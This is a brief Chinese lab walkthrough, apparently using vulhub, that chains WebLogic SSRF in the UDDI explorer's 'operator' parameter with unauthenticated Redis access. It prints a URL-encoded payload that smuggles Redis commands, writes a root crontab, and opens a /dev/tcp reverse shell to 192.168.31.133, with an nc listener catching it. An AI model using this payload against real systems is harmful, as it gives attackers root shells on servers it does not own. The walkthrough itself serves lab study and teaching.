进入vulhub下的weblogic ssrf路径下,启动容器docker-compose up -d
路径:/uddiexplorer/SearchPublicRegistries.jsp
输入数据然后提交,抓包
漏洞存在处:operator=
通过修改参数探测存活端口,404证明端口存在
探测端口不存在
可以通过爆破探测内网资产,但是本次用的vulhub,所以直接看下容器ip和服务,发现存在reids
docker inspect --format='{{.Name}} - {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $(docker ps -aq)
直接利用redis未授权访问反弹shell
命令:
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.31.133%2F5678%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
nc -lvvp开启监听,反弹成功